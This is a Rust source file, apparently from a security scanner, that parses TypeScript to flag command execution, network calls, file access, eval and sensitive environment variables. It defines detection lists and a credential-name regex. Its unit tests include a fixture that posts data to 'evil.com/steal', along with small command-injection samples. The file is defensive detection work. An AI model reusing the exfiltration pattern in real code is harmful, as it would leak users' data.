Skip to main content

agentshield/parser/
typescript.rs

1use std::collections::HashSet;
2use std::path::{Path, PathBuf};
3
4use once_cell::sync::Lazy;
5use regex::Regex;
6
7use super::{CallSite, FunctionDef, FunctionParam, LanguageParser, ParsedFile};
8use crate::analysis::cross_file::is_sanitizer;
9use crate::error::Result;
10use crate::ir::execution_surface::*;
11use crate::ir::{ArgumentSource, Language, SourceLocation};
12
13pub struct TypeScriptParser;
14
15// ── Dangerous patterns ───────────────────────────────────────────
16
17static EXEC_PATTERNS: Lazy<Vec<&str>> = Lazy::new(|| {
18    vec![
19        "exec",
20        "execSync",
21        "execFile",
22        "execFileSync",
23        "spawn",
24        "spawnSync",
25        "child_process.exec",
26        "child_process.execSync",
27        "child_process.execFile",
28        "child_process.execFileSync",
29        "child_process.spawn",
30        "child_process.spawnSync",
31        "cp.exec",
32        "cp.execSync",
33        "cp.spawn",
34        "cp.spawnSync",
35        "shelljs.exec",
36        "execa",
37        "execaSync",
38    ]
39});
40
41static NETWORK_PATTERNS: Lazy<Vec<&str>> = Lazy::new(|| {
42    vec![
43        "fetch",
44        "http.get",
45        "http.request",
46        "https.get",
47        "https.request",
48        "axios",
49        "axios.get",
50        "axios.post",
51        "axios.put",
52        "axios.patch",
53        "axios.delete",
54        "axios.request",
55        "got",
56        "got.get",
57        "got.post",
58        "got.put",
59        "got.patch",
60        "got.delete",
61        "request",
62        "request.get",
63        "request.post",
64        "superagent.get",
65        "superagent.post",
66        "undici.fetch",
67        "undici.request",
68    ]
69});
70
71static FILE_PATTERNS: Lazy<Vec<&str>> = Lazy::new(|| {
72    vec![
73        "readFile",
74        "readFileSync",
75        "writeFile",
76        "writeFileSync",
77        "appendFile",
78        "appendFileSync",
79        "unlink",
80        "unlinkSync",
81        "readdir",
82        "readdirSync",
83        "fs.readFile",
84        "fs.readFileSync",
85        "fs.writeFile",
86        "fs.writeFileSync",
87        "fs.appendFile",
88        "fs.appendFileSync",
89        "fs.unlink",
90        "fs.unlinkSync",
91        "fs.readdir",
92        "fs.readdirSync",
93        "fs.promises.readFile",
94        "fs.promises.writeFile",
95        "fs.promises.unlink",
96        "fs.promises.readdir",
97        "Deno.readTextFile",
98        "Deno.writeTextFile",
99        "Deno.readFile",
100        "Deno.writeFile",
101        "Bun.file",
102    ]
103});
104
105static DYNAMIC_EXEC_PATTERNS: Lazy<Vec<&str>> = Lazy::new(|| {
106    vec![
107        "eval",
108        "Function",
109        "vm.runInThisContext",
110        "vm.runInNewContext",
111    ]
112});
113
114static SENSITIVE_ENV_VARS: Lazy<Regex> = Lazy::new(|| {
115    Regex::new(r"(?i)(AWS_|SECRET|TOKEN|PASSWORD|API_KEY|PRIVATE_KEY|CREDENTIALS|AUTH)").unwrap()
116});
117
118// Template literal with interpolation: `...${expr}...`
119static TEMPLATE_LITERAL_RE: Lazy<Regex> = Lazy::new(|| Regex::new(r"\$\{[^}]+\}").unwrap());
120
121// Sanitizer assignment: const validPath = await validatePath(x)
122// Captures: (1) variable name, (2) function name (possibly dotted)
123static SANITIZER_ASSIGN_RE: Lazy<Regex> = Lazy::new(|| {
124    Regex::new(r"(?:const|let|var)\s+(\w+)\s*=\s*(?:await\s+)?(\w+(?:\.\w+)*)\s*\(").unwrap()
125});
126
127// ── tree-sitter AST parser ──────────────────────────────────────
128
129#[cfg(feature = "typescript")]
130impl LanguageParser for TypeScriptParser {
131    fn language(&self) -> Language {
132        Language::TypeScript
133    }
134
135    fn parse_file(&self, path: &Path, content: &str) -> Result<ParsedFile> {
136        let mut parser = tree_sitter::Parser::new();
137        let is_tsx = path
138            .extension()
139            .is_some_and(|ext| ext == "tsx" || ext == "jsx");
140
141        let lang = if is_tsx {
142            tree_sitter_typescript::LANGUAGE_TSX
143        } else {
144            tree_sitter_typescript::LANGUAGE_TYPESCRIPT
145        };
146
147        parser
148            .set_language(&lang.into())
149            .map_err(|e| crate::error::ShieldError::Parse {
150                file: path.display().to_string(),
151                message: format!("Failed to load TypeScript grammar: {e}"),
152            })?;
153
154        let tree = parser
155            .parse(content, None)
156            .ok_or_else(|| crate::error::ShieldError::Parse {
157                file: path.display().to_string(),
158                message: "tree-sitter failed to parse TypeScript".into(),
159            })?;
160
161        let file_path = PathBuf::from(path);
162        let source = content.as_bytes();
163        let mut parsed = ParsedFile::default();
164        let mut param_names = HashSet::new();
165
166        // Phase 0: Detect sanitizer assignments via regex on source text
167        detect_sanitizer_assignments(content, &mut parsed.sanitized_vars);
168
169        // Phase 1: Collect function parameters + function defs
170        collect_params(
171            tree.root_node(),
172            source,
173            &file_path,
174            &mut param_names,
175            &mut parsed,
176        );
177
178        // Phase 2: Walk AST for call expressions, call sites, and env accesses
179        walk_node(
180            tree.root_node(),
181            source,
182            &file_path,
183            &param_names,
184            &mut parsed,
185        );
186
187        Ok(parsed)
188    }
189}
190
191/// Recursively collect function/method/arrow parameter names + FunctionDef entries.
192#[cfg(feature = "typescript")]
193fn collect_params(
194    node: tree_sitter::Node,
195    source: &[u8],
196    file_path: &Path,
197    param_names: &mut HashSet<String>,
198    parsed: &mut ParsedFile,
199) {
200    let kind = node.kind();
201
202    // Function declarations, arrow functions, method definitions
203    if kind == "function_declaration"
204        || kind == "function"
205        || kind == "arrow_function"
206        || kind == "method_definition"
207        || kind == "function_expression"
208    {
209        let func_name = extract_function_name(node, source).unwrap_or_default();
210        let mut func_params = Vec::new();
211
212        if let Some(params_node) = node.child_by_field_name("parameters") {
213            for i in 0..params_node.named_child_count() {
214                if let Some(param) = params_node.named_child(i) {
215                    for name in extract_param_names(param, source) {
216                        if name != "this" {
217                            param_names.insert(name.clone());
218                            func_params.push(name.clone());
219                            parsed.function_params.push(FunctionParam {
220                                function_name: func_name.clone(),
221                                param_name: name,
222                                location: loc(file_path, param),
223                            });
224                        }
225                    }
226                }
227            }
228        }
229
230        // Record FunctionDef if we have a name
231        if !func_name.is_empty() {
232            let is_exported = is_exported_node(node, source);
233            parsed.function_defs.push(FunctionDef {
234                name: func_name,
235                params: func_params,
236                is_exported,
237                location: loc(file_path, node),
238            });
239        }
240    }
241
242    // Recurse
243    for i in 0..node.named_child_count() {
244        if let Some(child) = node.named_child(i) {
245            collect_params(child, source, file_path, param_names, parsed);
246        }
247    }
248}
249
250/// Check if a function node is exported (has `export` keyword in ancestors or declaration).
251#[cfg(feature = "typescript")]
252fn is_exported_node(node: tree_sitter::Node, source: &[u8]) -> bool {
253    // Check if the function/arrow is inside an export_statement
254    let mut current = node;
255    while let Some(parent) = current.parent() {
256        let pk = parent.kind();
257        if pk == "export_statement" {
258            return true;
259        }
260        // Stop at top-level statements
261        if pk == "program" || pk == "statement_block" {
262            break;
263        }
264        current = parent;
265    }
266    // Check for `module.exports` pattern — look at the parent variable_declarator
267    // e.g., module.exports.func = function(...) {}
268    if let Some(parent) = node.parent() {
269        let parent_text = node_text(parent, source);
270        if parent_text.contains("module.exports") || parent_text.contains("exports.") {
271            return true;
272        }
273    }
274    false
275}
276
277/// Extract a function's name from its AST node.
278#[cfg(feature = "typescript")]
279fn extract_function_name(node: tree_sitter::Node, source: &[u8]) -> Option<String> {
280    // For function_declaration/method_definition: name field
281    if let Some(name_node) = node.child_by_field_name("name") {
282        return Some(node_text(name_node, source).to_string());
283    }
284
285    // For arrow functions assigned to variables: look at parent
286    // const handler = async (params) => { ... }
287    if node.kind() == "arrow_function" || node.kind() == "function_expression" {
288        if let Some(parent) = node.parent() {
289            if parent.kind() == "variable_declarator" {
290                if let Some(name_node) = parent.child_by_field_name("name") {
291                    return Some(node_text(name_node, source).to_string());
292                }
293            }
294        }
295    }
296
297    None
298}
299
300/// Extract parameter name(s) from a formal_parameters child node.
301/// Returns a Vec because destructured patterns yield multiple names.
302#[cfg(feature = "typescript")]
303fn extract_param_names(node: tree_sitter::Node, source: &[u8]) -> Vec<String> {
304    match node.kind() {
305        // required_parameter or optional_parameter: has "pattern" field
306        "required_parameter" | "optional_parameter" => {
307            if let Some(pattern) = node.child_by_field_name("pattern") {
308                if pattern.kind() == "identifier" {
309                    return vec![node_text(pattern, source).to_string()];
310                }
311                // Destructured object pattern: { url, name } => ["url", "name"]
312                if pattern.kind() == "object_pattern" {
313                    return extract_object_pattern_names(pattern, source);
314                }
315                // Destructured array pattern: [a, b] => ["a", "b"]
316                if pattern.kind() == "array_pattern" {
317                    return extract_array_pattern_names(pattern, source);
318                }
319            }
320            vec![]
321        }
322        // Rest parameter: ...args
323        "rest_pattern" => {
324            for i in 0..node.named_child_count() {
325                if let Some(child) = node.named_child(i) {
326                    if child.kind() == "identifier" {
327                        return vec![node_text(child, source).to_string()];
328                    }
329                }
330            }
331            vec![]
332        }
333        // Plain identifier (JS-style params without type annotations)
334        "identifier" => vec![node_text(node, source).to_string()],
335        _ => vec![],
336    }
337}
338
339/// Extract property names from an object destructuring pattern: { url, name }
340#[cfg(feature = "typescript")]
341fn extract_object_pattern_names(node: tree_sitter::Node, source: &[u8]) -> Vec<String> {
342    let mut names = Vec::new();
343    for i in 0..node.named_child_count() {
344        if let Some(child) = node.named_child(i) {
345            match child.kind() {
346                // shorthand_property_identifier_pattern: { url } => "url"
347                "shorthand_property_identifier_pattern" => {
348                    names.push(node_text(child, source).to_string());
349                }
350                // pair_pattern: { url: myUrl } => "myUrl"
351                "pair_pattern" => {
352                    if let Some(value) = child.child_by_field_name("value") {
353                        if value.kind() == "identifier" {
354                            names.push(node_text(value, source).to_string());
355                        }
356                    }
357                }
358                _ => {}
359            }
360        }
361    }
362    names
363}
364
365/// Extract names from an array destructuring pattern: [a, b]
366#[cfg(feature = "typescript")]
367fn extract_array_pattern_names(node: tree_sitter::Node, source: &[u8]) -> Vec<String> {
368    let mut names = Vec::new();
369    for i in 0..node.named_child_count() {
370        if let Some(child) = node.named_child(i) {
371            if child.kind() == "identifier" {
372                names.push(node_text(child, source).to_string());
373            }
374        }
375    }
376    names
377}
378
379/// Walk the AST looking for call_expression and member_expression (for env access).
380#[cfg(feature = "typescript")]
381fn walk_node(
382    node: tree_sitter::Node,
383    source: &[u8],
384    file_path: &Path,
385    param_names: &HashSet<String>,
386    parsed: &mut ParsedFile,
387) {
388    let kind = node.kind();
389
390    // Check for process.env access: process.env.VAR or process.env["VAR"]
391    if kind == "member_expression" || kind == "subscript_expression" {
392        let text = node_text(node, source);
393        if text.starts_with("process.env") {
394            let var_name = extract_env_var_name(node, source);
395            if let Some(name) = &var_name {
396                let is_sensitive = SENSITIVE_ENV_VARS.is_match(name);
397                parsed.env_accesses.push(EnvAccess {
398                    var_name: ArgumentSource::Literal(name.clone()),
399                    is_sensitive,
400                    location: loc(file_path, node),
401                });
402            }
403        }
404    }
405
406    // Check for call_expression
407    if kind == "call_expression" {
408        if let Some(func_node) = node.child_by_field_name("function") {
409            let func_name = resolve_call_name(func_node, source);
410
411            // Classify all arguments (not just the first) for CallSite recording
412            let args_node = node.child_by_field_name("arguments");
413            let all_arg_sources =
414                classify_all_arguments(args_node, source, param_names, &parsed.sanitized_vars);
415
416            // First argument source for existing detector logic
417            let arg_source = all_arg_sources
418                .first()
419                .cloned()
420                .unwrap_or(ArgumentSource::Unknown);
421
422            // Record CallSite for cross-file analysis
423            let caller_name = find_enclosing_function(node, source);
424            parsed.call_sites.push(CallSite {
425                callee: func_name.clone(),
426                arguments: all_arg_sources,
427                caller: caller_name,
428                location: loc(file_path, node),
429            });
430
431            // Command execution
432            if matches_pattern(&func_name, &EXEC_PATTERNS) {
433                parsed.commands.push(CommandInvocation {
434                    function: func_name.clone(),
435                    command_arg: arg_source.clone(),
436                    location: loc(file_path, node),
437                });
438            }
439
440            // Network operations
441            if matches_pattern(&func_name, &NETWORK_PATTERNS) {
442                let full_args_text = node
443                    .child_by_field_name("arguments")
444                    .map(|a| node_text(a, source).to_string())
445                    .unwrap_or_default();
446                let sends_data = func_name.contains("post")
447                    || func_name.contains("put")
448                    || func_name.contains("patch")
449                    || full_args_text.contains("body:")
450                    || full_args_text.contains("data:");
451                let method = if func_name.contains("get") {
452                    Some("GET".into())
453                } else if func_name.contains("post") {
454                    Some("POST".into())
455                } else if func_name.contains("put") {
456                    Some("PUT".into())
457                } else {
458                    None
459                };
460                parsed.network_operations.push(NetworkOperation {
461                    function: func_name.clone(),
462                    url_arg: arg_source.clone(),
463                    method,
464                    sends_data,
465                    location: loc(file_path, node),
466                });
467            }
468
469            // Dynamic execution
470            if DYNAMIC_EXEC_PATTERNS.contains(&func_name.as_str()) {
471                parsed.dynamic_exec.push(DynamicExec {
472                    function: func_name.clone(),
473                    code_arg: arg_source.clone(),
474                    location: loc(file_path, node),
475                });
476            }
477
478            // File operations
479            if matches_pattern(&func_name, &FILE_PATTERNS) {
480                let op_type = if func_name.contains("write") || func_name.contains("append") {
481                    FileOpType::Write
482                } else if func_name.contains("unlink") {
483                    FileOpType::Delete
484                } else if func_name.contains("readdir") {
485                    FileOpType::List
486                } else {
487                    FileOpType::Read
488                };
489                parsed.file_operations.push(FileOperation {
490                    operation: op_type,
491                    path_arg: arg_source.clone(),
492                    location: loc(file_path, node),
493                });
494            }
495        }
496    }
497
498    // Recurse into children (skip already-processed subtrees)
499    for i in 0..node.named_child_count() {
500        if let Some(child) = node.named_child(i) {
501            walk_node(child, source, file_path, param_names, parsed);
502        }
503    }
504}
505
506/// Classify all arguments in a call expression (tree-sitter path).
507#[cfg(feature = "typescript")]
508fn classify_all_arguments(
509    args_node: Option<tree_sitter::Node>,
510    source: &[u8],
511    param_names: &HashSet<String>,
512    sanitized_vars: &HashSet<String>,
513) -> Vec<ArgumentSource> {
514    let Some(args) = args_node else {
515        return Vec::new();
516    };
517    let mut result = Vec::new();
518    for i in 0..args.named_child_count() {
519        if let Some(arg) = args.named_child(i) {
520            let arg_text = node_text(arg, source).to_string();
521            result.push(classify_argument_with_sanitizers(
522                &arg_text,
523                param_names,
524                sanitized_vars,
525            ));
526        }
527    }
528    result
529}
530
531/// Find the enclosing function name for a node (for caller tracking).
532#[cfg(feature = "typescript")]
533fn find_enclosing_function(node: tree_sitter::Node, source: &[u8]) -> Option<String> {
534    let mut current = node;
535    while let Some(parent) = current.parent() {
536        let pk = parent.kind();
537        if pk == "function_declaration"
538            || pk == "function"
539            || pk == "arrow_function"
540            || pk == "method_definition"
541            || pk == "function_expression"
542        {
543            return extract_function_name(parent, source);
544        }
545        current = parent;
546    }
547    None
548}
549
550/// Resolve a call expression's function name from its AST node.
551/// Handles: identifier, member_expression chains (a.b.c), optional_chain.
552#[cfg(feature = "typescript")]
553fn resolve_call_name(node: tree_sitter::Node, source: &[u8]) -> String {
554    match node.kind() {
555        "identifier" => node_text(node, source).to_string(),
556        "member_expression" | "optional_chain_expression" => {
557            // Flatten the member chain: a.b.c
558            node_text(node, source).replace(['\n', ' '], "").to_string()
559        }
560        _ => node_text(node, source).to_string(),
561    }
562}
563
564/// Extract environment variable name from process.env access.
565#[cfg(feature = "typescript")]
566fn extract_env_var_name(node: tree_sitter::Node, source: &[u8]) -> Option<String> {
567    let text = node_text(node, source);
568    // process.env.VAR_NAME
569    if let Some(rest) = text.strip_prefix("process.env.") {
570        return Some(rest.to_string());
571    }
572    // process.env["VAR_NAME"] or process.env['VAR_NAME']
573    if node.kind() == "subscript_expression" {
574        if let Some(index) = node.child_by_field_name("index") {
575            let idx_text = node_text(index, source);
576            let trimmed = idx_text.trim_matches('"').trim_matches('\'').to_string();
577            if !trimmed.is_empty() {
578                return Some(trimmed);
579            }
580        }
581    }
582    None
583}
584
585/// Get the text of a tree-sitter node.
586#[cfg(feature = "typescript")]
587fn node_text<'a>(node: tree_sitter::Node, source: &'a [u8]) -> &'a str {
588    node.utf8_text(source).unwrap_or("")
589}
590
591/// Build a SourceLocation from a tree-sitter node (1-indexed lines).
592#[cfg(feature = "typescript")]
593fn loc(file: &Path, node: tree_sitter::Node) -> SourceLocation {
594    let start = node.start_position();
595    let end = node.end_position();
596    SourceLocation {
597        file: file.to_path_buf(),
598        line: start.row + 1,
599        column: start.column,
600        end_line: Some(end.row + 1),
601        end_column: Some(end.column),
602    }
603}
604
605// ── Shared sanitizer detection ──────────────────────────────────
606
607/// Detect sanitizer assignments in source code and populate sanitized_vars.
608/// Matches patterns like: `const validPath = await validatePath(x)`
609fn detect_sanitizer_assignments(content: &str, sanitized_vars: &mut HashSet<String>) {
610    for cap in SANITIZER_ASSIGN_RE.captures_iter(content) {
611        let var_name = &cap[1];
612        let func_name = &cap[2];
613        if is_sanitizer(func_name) {
614            sanitized_vars.insert(var_name.to_string());
615        }
616    }
617}
618
619/// Classify an argument, considering sanitized variables.
620fn classify_argument_with_sanitizers(
621    arg_text: &str,
622    param_names: &HashSet<String>,
623    sanitized_vars: &HashSet<String>,
624) -> ArgumentSource {
625    let first_arg = arg_text.split(',').next().unwrap_or("").trim();
626
627    if first_arg.is_empty() {
628        return ArgumentSource::Unknown;
629    }
630
631    // Check if this is a sanitized variable (before other checks)
632    let ident = first_arg.split('.').next().unwrap_or(first_arg);
633    let ident = ident.split('[').next().unwrap_or(ident);
634    if sanitized_vars.contains(ident) {
635        return ArgumentSource::Sanitized {
636            sanitizer: ident.to_string(),
637        };
638    }
639
640    // Delegate to existing classification
641    classify_argument_text(first_arg, param_names)
642}
643
644// ── Regex fallback parser (when typescript feature is disabled) ──
645
646#[cfg(not(feature = "typescript"))]
647static CALL_RE: Lazy<Regex> =
648    Lazy::new(|| Regex::new(r"(?m)(\w+(?:\.\w+)*)\s*\(([^)]*)\)").unwrap());
649
650#[cfg(not(feature = "typescript"))]
651static ENV_ACCESS_RE: Lazy<Regex> = Lazy::new(|| {
652    Regex::new(r#"(?m)process\.env\s*(?:\[\s*["']([^"']+)["']\s*\]|\.([A-Z_][A-Z0-9_]*))"#).unwrap()
653});
654
655#[cfg(not(feature = "typescript"))]
656static FUNC_DEF_RE: Lazy<Regex> = Lazy::new(|| {
657    Regex::new(
658        r"(?m)(?:(?:export\s+)?(?:async\s+)?function\s+(\w+)\s*\(([^)]*)\)|(?:const|let|var)\s+(\w+)\s*=\s*(?:async\s+)?\(([^)]*)\)\s*(?:=>|:\s*\w+\s*=>)|(\w+)\s*\(([^)]*)\)\s*(?::\s*\w+\s*)?\{)"
659    ).unwrap()
660});
661
662#[cfg(not(feature = "typescript"))]
663static EXPORT_RE: Lazy<Regex> = Lazy::new(|| Regex::new(r"^(?:export\s+)").unwrap());
664
665#[cfg(not(feature = "typescript"))]
666impl LanguageParser for TypeScriptParser {
667    fn language(&self) -> Language {
668        Language::TypeScript
669    }
670
671    fn parse_file(&self, path: &Path, content: &str) -> Result<ParsedFile> {
672        let mut parsed = ParsedFile::default();
673        let file_path = PathBuf::from(path);
674        let mut param_names = HashSet::new();
675
676        // Phase 0: Detect sanitizer assignments
677        detect_sanitizer_assignments(content, &mut parsed.sanitized_vars);
678
679        // Collect function parameter names + FunctionDef entries
680        for cap in FUNC_DEF_RE.captures_iter(content) {
681            let params_str = cap
682                .get(2)
683                .or_else(|| cap.get(4))
684                .or_else(|| cap.get(6))
685                .map(|m| m.as_str())
686                .unwrap_or("");
687            let func_name = cap
688                .get(1)
689                .or_else(|| cap.get(3))
690                .or_else(|| cap.get(5))
691                .map(|m| m.as_str())
692                .unwrap_or("");
693
694            let full_match = cap.get(0).map(|m| m.as_str()).unwrap_or("");
695            let is_exported = full_match.starts_with("export");
696
697            let mut func_params = Vec::new();
698            for param in params_str.split(',') {
699                let param = param.trim();
700                if param.starts_with('{') || param.starts_with('[') {
701                    continue;
702                }
703                let param = param.split(':').next().unwrap_or("").trim();
704                let param = param.split('=').next().unwrap_or("").trim();
705                let param = param.trim_start_matches("...");
706                let param = param.trim_end_matches('?');
707                if !param.is_empty() && param != "this" {
708                    param_names.insert(param.to_string());
709                    func_params.push(param.to_string());
710                    parsed.function_params.push(FunctionParam {
711                        function_name: func_name.to_string(),
712                        param_name: param.to_string(),
713                        location: regex_loc(&file_path, 0),
714                    });
715                }
716            }
717
718            if !func_name.is_empty() {
719                parsed.function_defs.push(FunctionDef {
720                    name: func_name.to_string(),
721                    params: func_params,
722                    is_exported,
723                    location: regex_loc(&file_path, 0),
724                });
725            }
726        }
727
728        // Scan line by line
729        for (line_idx, line) in content.lines().enumerate() {
730            let line_num = line_idx + 1;
731            let trimmed = line.trim();
732
733            if trimmed.starts_with("//") || trimmed.starts_with('*') || trimmed.starts_with("/*") {
734                continue;
735            }
736
737            for cap in ENV_ACCESS_RE.captures_iter(line) {
738                let var_name = cap
739                    .get(1)
740                    .or_else(|| cap.get(2))
741                    .map(|m| m.as_str().to_string())
742                    .unwrap_or_default();
743                let is_sensitive = SENSITIVE_ENV_VARS.is_match(&var_name);
744                parsed.env_accesses.push(EnvAccess {
745                    var_name: ArgumentSource::Literal(var_name),
746                    is_sensitive,
747                    location: regex_loc(&file_path, line_num),
748                });
749            }
750
751            for cap in CALL_RE.captures_iter(line) {
752                let func_name = &cap[1];
753                let args_str = &cap[2];
754                let arg_source = classify_argument_with_sanitizers(
755                    args_str,
756                    &param_names,
757                    &parsed.sanitized_vars,
758                );
759
760                // Record CallSite
761                let all_args = args_str
762                    .split(',')
763                    .map(|a| {
764                        classify_argument_with_sanitizers(
765                            a.trim(),
766                            &param_names,
767                            &parsed.sanitized_vars,
768                        )
769                    })
770                    .collect::<Vec<_>>();
771                parsed.call_sites.push(CallSite {
772                    callee: func_name.to_string(),
773                    arguments: all_args,
774                    caller: None, // Regex path can't easily determine enclosing function
775                    location: regex_loc(&file_path, line_num),
776                });
777
778                if matches_pattern(func_name, &EXEC_PATTERNS) {
779                    parsed.commands.push(CommandInvocation {
780                        function: func_name.to_string(),
781                        command_arg: arg_source.clone(),
782                        location: regex_loc(&file_path, line_num),
783                    });
784                }
785
786                if matches_pattern(func_name, &NETWORK_PATTERNS) {
787                    let sends_data = func_name.contains("post")
788                        || func_name.contains("put")
789                        || func_name.contains("patch")
790                        || args_str.contains("body:")
791                        || args_str.contains("data:");
792                    let method = if func_name.contains("get") {
793                        Some("GET".into())
794                    } else if func_name.contains("post") {
795                        Some("POST".into())
796                    } else if func_name.contains("put") {
797                        Some("PUT".into())
798                    } else {
799                        None
800                    };
801                    parsed.network_operations.push(NetworkOperation {
802                        function: func_name.to_string(),
803                        url_arg: arg_source.clone(),
804                        method,
805                        sends_data,
806                        location: regex_loc(&file_path, line_num),
807                    });
808                }
809
810                if DYNAMIC_EXEC_PATTERNS.contains(&func_name) {
811                    parsed.dynamic_exec.push(DynamicExec {
812                        function: func_name.to_string(),
813                        code_arg: arg_source.clone(),
814                        location: regex_loc(&file_path, line_num),
815                    });
816                }
817
818                if matches_pattern(func_name, &FILE_PATTERNS) {
819                    let op_type = if func_name.contains("write") || func_name.contains("append") {
820                        FileOpType::Write
821                    } else if func_name.contains("unlink") {
822                        FileOpType::Delete
823                    } else if func_name.contains("readdir") {
824                        FileOpType::List
825                    } else {
826                        FileOpType::Read
827                    };
828                    parsed.file_operations.push(FileOperation {
829                        operation: op_type,
830                        path_arg: arg_source.clone(),
831                        location: regex_loc(&file_path, line_num),
832                    });
833                }
834            }
835        }
836
837        Ok(parsed)
838    }
839}
840
841#[cfg(not(feature = "typescript"))]
842fn regex_loc(file: &Path, line: usize) -> SourceLocation {
843    SourceLocation {
844        file: file.to_path_buf(),
845        line,
846        column: 0,
847        end_line: None,
848        end_column: None,
849    }
850}
851
852// ── Shared helpers ──────────────────────────────────────────────
853
854/// Check if a function name matches any pattern in the list.
855fn matches_pattern(func_name: &str, patterns: &[&str]) -> bool {
856    patterns
857        .iter()
858        .any(|p| func_name == *p || func_name.ends_with(p))
859}
860
861/// Classify an argument text to determine its source.
862fn classify_argument_text(arg_text: &str, param_names: &HashSet<String>) -> ArgumentSource {
863    let first_arg = arg_text.split(',').next().unwrap_or("").trim();
864
865    if first_arg.is_empty() {
866        return ArgumentSource::Unknown;
867    }
868
869    // String literal (double or single quoted)
870    if (first_arg.starts_with('"') && first_arg.ends_with('"'))
871        || (first_arg.starts_with('\'') && first_arg.ends_with('\''))
872    {
873        if first_arg.len() >= 2 {
874            let val = &first_arg[1..first_arg.len() - 1];
875            return ArgumentSource::Literal(val.to_string());
876        }
877        return ArgumentSource::Literal(String::new());
878    }
879
880    // Template literal with interpolation: `...${var}...`
881    if first_arg.starts_with('`') {
882        if TEMPLATE_LITERAL_RE.is_match(first_arg) {
883            return ArgumentSource::Interpolated;
884        }
885        let val = first_arg.trim_matches('`');
886        return ArgumentSource::Literal(val.to_string());
887    }
888
889    // String concatenation with +
890    if first_arg.contains('+') && (first_arg.contains('"') || first_arg.contains('\'')) {
891        return ArgumentSource::Interpolated;
892    }
893
894    // process.env reference
895    if first_arg.contains("process.env") {
896        return ArgumentSource::EnvVar {
897            name: first_arg.to_string(),
898        };
899    }
900
901    // Known function parameter
902    let ident = first_arg.split('.').next().unwrap_or(first_arg);
903    let ident = ident.split('[').next().unwrap_or(ident);
904    if param_names.contains(ident) {
905        return ArgumentSource::Parameter {
906            name: ident.to_string(),
907        };
908    }
909
910    ArgumentSource::Unknown
911}
912
913#[cfg(test)]
914mod tests {
915    use super::*;
916
917    #[test]
918    fn detects_exec_with_param() {
919        let code = r#"
920import { exec } from "child_process";
921
922function runCommand(command: string) {
923    exec(command);
924}
925"#;
926        let parsed = TypeScriptParser
927            .parse_file(Path::new("test.ts"), code)
928            .unwrap();
929        assert_eq!(parsed.commands.len(), 1);
930        assert!(matches!(
931            parsed.commands[0].command_arg,
932            ArgumentSource::Parameter { .. }
933        ));
934    }
935
936    #[test]
937    fn detects_spawn_with_interpolation() {
938        let code = r#"
939function run(cmd: string) {
940    exec(`${cmd} --flag`);
941}
942"#;
943        let parsed = TypeScriptParser
944            .parse_file(Path::new("test.ts"), code)
945            .unwrap();
946        assert_eq!(parsed.commands.len(), 1);
947        assert!(matches!(
948            parsed.commands[0].command_arg,
949            ArgumentSource::Interpolated
950        ));
951    }
952
953    #[test]
954    fn detects_fetch_with_param() {
955        let code = r#"
956async function fetchUrl(url: string) {
957    const resp = await fetch(url);
958    return resp.json();
959}
960"#;
961        let parsed = TypeScriptParser
962            .parse_file(Path::new("test.ts"), code)
963            .unwrap();
964        assert_eq!(parsed.network_operations.len(), 1);
965        assert!(matches!(
966            parsed.network_operations[0].url_arg,
967            ArgumentSource::Parameter { .. }
968        ));
969    }
970
971    #[test]
972    fn safe_literal_url_not_flagged() {
973        let code = r#"
974async function getHealth() {
975    const resp = await fetch("https://api.example.com/health");
976    return resp.json();
977}
978"#;
979        let parsed = TypeScriptParser
980            .parse_file(Path::new("test.ts"), code)
981            .unwrap();
982        assert_eq!(parsed.network_operations.len(), 1);
983        assert!(matches!(
984            parsed.network_operations[0].url_arg,
985            ArgumentSource::Literal(_)
986        ));
987    }
988
989    #[test]
990    fn detects_env_var_access() {
991        let code = r#"
992const apiKey = process.env["OPENAI_API_KEY"];
993const secret = process.env.AWS_SECRET_ACCESS_KEY;
994"#;
995        let parsed = TypeScriptParser
996            .parse_file(Path::new("test.ts"), code)
997            .unwrap();
998        assert_eq!(parsed.env_accesses.len(), 2);
999        assert!(parsed.env_accesses[0].is_sensitive);
1000        assert!(parsed.env_accesses[1].is_sensitive);
1001    }
1002
1003    #[test]
1004    fn detects_eval() {
1005        let code = r#"
1006function execute(code: string) {
1007    eval(code);
1008}
1009"#;
1010        let parsed = TypeScriptParser
1011            .parse_file(Path::new("test.ts"), code)
1012            .unwrap();
1013        assert_eq!(parsed.dynamic_exec.len(), 1);
1014        assert!(matches!(
1015            parsed.dynamic_exec[0].code_arg,
1016            ArgumentSource::Parameter { .. }
1017        ));
1018    }
1019
1020    #[test]
1021    fn detects_file_operations() {
1022        let code = r#"
1023import fs from "fs";
1024
1025function readConfig(path: string) {
1026    return fs.readFileSync(path, "utf-8");
1027}
1028"#;
1029        let parsed = TypeScriptParser
1030            .parse_file(Path::new("test.ts"), code)
1031            .unwrap();
1032        assert_eq!(parsed.file_operations.len(), 1);
1033        assert!(matches!(
1034            parsed.file_operations[0].path_arg,
1035            ArgumentSource::Parameter { .. }
1036        ));
1037    }
1038
1039    #[test]
1040    fn detects_arrow_function_params() {
1041        let code = r#"
1042const handler = async (url: string) => {
1043    const resp = await fetch(url);
1044    return resp.text();
1045};
1046"#;
1047        let parsed = TypeScriptParser
1048            .parse_file(Path::new("test.ts"), code)
1049            .unwrap();
1050        assert_eq!(parsed.network_operations.len(), 1);
1051        assert!(matches!(
1052            parsed.network_operations[0].url_arg,
1053            ArgumentSource::Parameter { .. }
1054        ));
1055    }
1056
1057    #[test]
1058    fn detects_axios_post() {
1059        let code = r#"
1060async function exfiltrate(data: string) {
1061    await axios.post("https://evil.com/steal", { body: data });
1062}
1063"#;
1064        let parsed = TypeScriptParser
1065            .parse_file(Path::new("test.ts"), code)
1066            .unwrap();
1067        assert_eq!(parsed.network_operations.len(), 1);
1068        assert!(parsed.network_operations[0].sends_data);
1069    }
1070
1071    // ── Tests requiring tree-sitter AST (multi-line, TSX, accurate positions) ──
1072
1073    #[cfg(feature = "typescript")]
1074    #[test]
1075    fn detects_multiline_exec_call() {
1076        let code = r#"
1077function runCommand(command: string) {
1078    exec(
1079        command,
1080        { encoding: "utf-8" }
1081    );
1082}
1083"#;
1084        let parsed = TypeScriptParser
1085            .parse_file(Path::new("test.ts"), code)
1086            .unwrap();
1087        assert_eq!(parsed.commands.len(), 1);
1088        assert!(matches!(
1089            parsed.commands[0].command_arg,
1090            ArgumentSource::Parameter { .. }
1091        ));
1092    }
1093
1094    #[cfg(feature = "typescript")]
1095    #[test]
1096    fn detects_multiline_fetch() {
1097        let code = r#"
1098async function sendData(url: string) {
1099    const resp = await fetch(
1100        url,
1101        {
1102            method: "POST",
1103            body: JSON.stringify({ key: "value" }),
1104        }
